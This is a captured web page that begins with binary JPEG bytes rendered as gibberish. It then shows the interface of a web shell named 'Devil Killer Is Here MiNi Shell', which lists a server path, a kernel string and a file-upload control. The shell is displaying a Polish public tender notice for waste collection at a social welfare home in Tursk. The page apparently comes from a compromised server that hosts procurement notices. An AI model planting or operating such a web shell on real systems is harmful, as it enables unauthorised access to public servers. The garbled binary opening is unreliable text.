JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241113/0059291201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów z Domu Pomocy Społecznej w m. Tursk </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ W TURSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 211037617</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tursk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">69-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpstursk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.wrota.lubuskie.pl/dpstursk/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów z Domu Pomocy Społecznej w m. Tursk </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f98b55d3-839d-49c3-bc67-f866e138e950</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00592912</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00585180/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór i zagospodarowanie odpadów z Domu Pomocy Społecznej w m. Tursk</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f98b55d3-839d-49c3-bc67-f866e138e950 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f98b55d3-839d-49c3-bc67-f866e138e950</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozdziałem XIII i XIV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem II ust. 1 pkt od 1 do 8 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem II ust. 1 pkt 9 i 10 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO.3300.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I – Odbiór i zagospodarowanie odpadów komunalnych z DPS w Tursku w 2025 r. (skrót – Odpady komunalne)<br/>1.	Przedmiotem zamówienia części I jest usługa polegająca na odbiorze, transporcie do miejsca dalszego gospodarowania i zagospodarowanie odpadów komunalnych z Domu Pomocy Społecznej w Tursku, a także dostarczenie i ustawieniu pojemników/kontenerów zamykanych z możliwością swobodnego otwierania pokryw/klap na:<br/>•	odpady o kodzie 20 03 01 (zmieszane) – 8 pojemników o pojemności 1100 l,<br/>•	odpady o kodzie 15 01 01 (papier) – 2 pojemniki o pojemności 1100 l z napisem ,,papier”,<br/>•	odpady o kodzie 15 01 02 (plastik) – 1 pojemnik o pojemności 1100 l z napisem ,,plastik”,<br/>•	odpady o kodzie 15 01 07 (szkło) – 1 pojemnik o pojemności 1100 l z napisem ,,szkło”,<br/>•	odpady o kodzie 20 02 01 (ulegające biodegradacji) – 5 pojemniki o pojemności 120 l z napisem ,,bio”,<br/>2.	Częstotliwość odbioru odpadów:<br/>a)	odpady o kodzie 20 03 01 (zmieszane) – 1 raz w tygodniu <br/>b)	odpady o kodzie 15 01 01 (papier) – 1 raz w tygodniu <br/>c)	odpady o kodzie 15 01 02 (plastik) – 1 raz w tygodniu<br/>d)	odpady o kodzie 15 01 07 (szkło) – 1 raz w tygodniu<br/>e)	odpady o kodzie 20 02 01 (ulegające biodegradacji) – 1 raz w tygodniu<br/>Dodatkowy odbiór odpadów komunalnych z pojemników odbywać się będzie na zgłoszenie przedstawiciela Zamawiającego, zgodnie z ofertą wykonawcy (kryterium oceny oferty opisane w rozdziale XIX SWZ).<br/><br/>Dalszy opis przedmiotu zamówienia znajduje się w rozdziale IV SWZ oraz we wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Prawo Zamówień Publicznych po zrealizowaniu umowy w zakresie zamówienia podstawowego w 100% w zakresie danego rodzaju odpadu:<br/>a.	Prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe w czasie trwania umowy;<br/>b.	Rodzaj i maksymalną wielkość opcji określa Kalkulacja ceny ofertowej (Załącznik nr 1A do SWZ).<br/>c.	O zamiarze skorzystania z prawa opcji wraz z podaniem jego zakresu, Zamawiający poinformuje Wykonawcę odrębnym pismem w trakcie trwania umowy, po wykorzystaniu ilości zamówienia podstawowego z jednoczesnym wskazaniem rodzaju odpadu i jego ilości podlegających zamówieniom w ramach opcji. Dopuszczalne jest wielokrotne udzielanie zamówień opcjonalnych, jednak łącznie do ilości wskazanych w Kalkulacja ceny ofertowej (Załącznik nr 1A do SWZ).<br/>d.	Realizacja zamówienia z prawem opcji uzależniona będzie od potrzeb Zamawiającego oraz wysokości środków finansowych przydzielonych na ten cel w budżecie Zamawiającego. <br/>e.	W razie udzielenia zamówienia opcjonalnego w mniejszej wysokości bądź wcale, Wykonawcy nie przysługują jakiekolwiek roszczenia z tego tytułu względem zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklaracja dodatkowego terminu odbioru odpadów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II – Odbiór i zagospodarowanie odpadów kategorii 3 z DPS w Tursku w 2025 r. (skrót – Odpady kategorii 3)<br/>1.	Przedmiotem zamówienia części II jest świadczenie usługi odbioru i zagospodarowania odpadów kategorii 3 z siedziby Zamawiającego - DPS oraz ich transport do odbiorcy prowadzącego utylizację, odzysk lub recykling odpadów oraz doprowadzenie do utylizacji tych odpadów przez uprawniony organ gospodarczy.<br/>2.	Wykonawca wykona usługę odbioru, transportu i utylizacji odpadów kategorii 3<br/>z Domu Pomocy Społecznej w Tursku w cenie jednostkowej wskazanej w załączniku nr 1B – Kalkulacja Ceny Ofertowej – część II.<br/>3.	Wykonawca musi posiadać wszelkie konieczne rejestracje, pozwolenia, zezwolenia lub licencje, wydane przez właściwe organy zezwalające na transport odpadów na terenie całej Polski.<br/>4.	Wykonawca udostępni pojemniki na odpady o pojemności 120l w ilości 8 szt. lub 4 szt. 240l na odpady 3 kategorii Zamawiającemu, a Zamawiający zobowiązuje się gromadzić odpady w pojemnikach nie dopuszczając do ich przepełnienia oraz użytkować pojemnik nie dopuszczając do jego uszkodzeń. W przypadku uszkodzenia pojemnika Zamawiający zostanie obciążony kosztami jego zakupu pomniejszonymi o okres amortyzacji. <br/>5.	Wykonawca nie jest zobowiązany do odbioru odpadów gromadzonych poza pojemnikami.<br/>6.	Zamawiający zobowiązuje się zapewnić właściwy bezkolizyjny dostęp do pojemnika z odpadami.<br/><br/>Dalszy opis przedmiotu zamówienia znajduje się w rozdziale IV SWZ oraz we wzorze umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90510000-5 - Usuwanie i obróbka odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Prawo Zamówień Publicznych po zrealizowaniu umowy w zakresie zamówienia podstawowego w 100% w zakresie danego rodzaju odpadu:<br/>b.	Prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe w czasie trwania umowy;<br/>c.	Rodzaj i maksymalną wielkość opcji określa Kalkulacja ceny ofertowej (Załącznik nr 1B do SWZ).<br/>d.	O zamiarze skorzystania z prawa opcji wraz z podaniem jego zakresu, Zamawiający poinformuje Wykonawcę odrębnym pismem w trakcie trwania umowy, po wykorzystaniu ilości zamówienia podstawowego z jednoczesnym wskazaniem rodzaju odpadu i jego ilości podlegających zamówieniom w ramach opcji. Dopuszczalne jest wielokrotne udzielanie zamówień opcjonalnych, jednak łącznie do ilości wskazanych w Kalkulacja ceny ofertowej (Załącznik nr 1B do SWZ).<br/>e.	Realizacja zamówienia z prawem opcji uzależniona będzie od potrzeb Zamawiającego oraz wysokości środków finansowych przydzielonych na ten cel w budżecie Zamawiającego. <br/>f.	W razie udzielenia zamówienia opcjonalnego w mniejszej wysokości bądź wcale, Wykonawcy nie przysługują jakiekolwiek roszczenia z tego tytułu względem zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklaracja dodatkowego terminu odbioru odpadów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX niniejszej SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>-	zamawiający nie stawia warunku w powyższym zakresie dla żadnej z części;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>a) dla części I – odpady komunalne<br/>	wpisu do rejestru działalności regulowanej, o którym mowa w art. 9b ust. 2 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>	wpisu do rejestru Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO), zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach;<br/>b) dla części II – odpady kategorii 3<br/>	wpisu do rejestru podmiotów utylizacyjnych prowadzonego przez Główny Inspektorat Weterynarii, zgodnie z przepisami ustawy z dnia 11 marca 2004 roku o ochronie zdrowia zwierząt oraz zwalczania chorób zakaźnych zwierząt (t.j. Dz. U. z 2023 r. poz. 1075 z późn. zm.) oraz Rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1069/2009 z dnia 21 października 2009 r. określającego przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego nieprzeznaczonych do spożycia przez ludzi i uchylające rozporządzenie (WE) nr 1772/2002 (rozporządzenie o produktach ubocznych pochodzenia zwierzęcego),<br/>	wpisu do rejestru Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO), zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach;<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>-	zamawiający nie stawia warunku w powyższym zakresie dla żadnej z części;<br/>4)	zdolności technicznej lub zawodowej:<br/>a)	Dla części I – odpady komunalne<br/>Wykonawca musi wykazać, że dysponuje wyposażeniem umożliwiającym odbieranie odpadów w ilości co najmniej:<br/>- 1 pojazd przystosowany do odbierania zmieszanych odpadów komunalnych;<br/>- 1 pojazd przystosowany do odbierania selektywnie zebranych odpadów komunalnych<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia (część I), w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>b)	Dla części II – odpady kategorii 3<br/>Zamawiający nie stawia warunku w powyższym zakresie dla części II. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Część I - Odpady komunalne:<br/>1)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa wart. 125 ust.1 ustawy, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 pkt 3 - 6 ustawy pzp - załącznik nr 4.1 do SWZ.<br/>Część II - Odpady kategorii 3<br/>1)	Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa wart. 125 ust.1 ustawy, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 pkt 3 - 6 ustawy pzp - załącznik nr 4.2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Część I - Odpady komunalne:<br/>1)	oświadczenie o posiadanym wpisie do rejestru działalności regulowanej, o którym mowa w art. 9b ust. 2 Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>2)	dokument potwierdzający nadanie numeru wpisu do rejestru Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO), zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach,<br/>3)	Wykazu narzędzi, wyposażenie zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami tj. Wykaz sprzętu wymienionego w rozdziale VIII ust. 2 pkt. 4a) SWZ – załącznik nr 5.1 do SWZ;<br/><br/>Część II - Odpady kategorii 3<br/>1)	dokument potwierdzający nadanie weterynaryjnego numeru identyfikacyjnego potwierdzającego wpis do rejestru podmiotów utylizacyjnych,<br/>2)	dokument potwierdzający nadanie numeru wpisu do rejestru Bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO), zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 19.	Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1.1 do SWZ wraz z Kalkulacją ceny ofertowej - Załącznik nr 1A do SWZ (część I) i/lub z Załącznikiem nr 1.2 do SWZ wraz z Kalkulacją ceny ofertowej - Załącznik nr 1B do SWZ (część II) Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenie o braku przesłanek wykluczenia oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 2.1 do SWZ i/lub załącznik nr 2.2 do SWZ).<br/>2)	pełnomocnictwo udzielane osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego (jeżeli dotyczy).<br/>3)	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) Wykonawcy składają oświadczenie – załącznik nr 6.1 do SWZ i/lub załącznik nr 6.2 do SWZ.<br/>4)	Potwierdzenie wpłaty wadium.<br/>5)	Zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy wraz z oświadczeniem składanym na podstawie art. 125 ust. 1 ustawy pzp - Załącznik nr 3.1 i 3.1a (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga 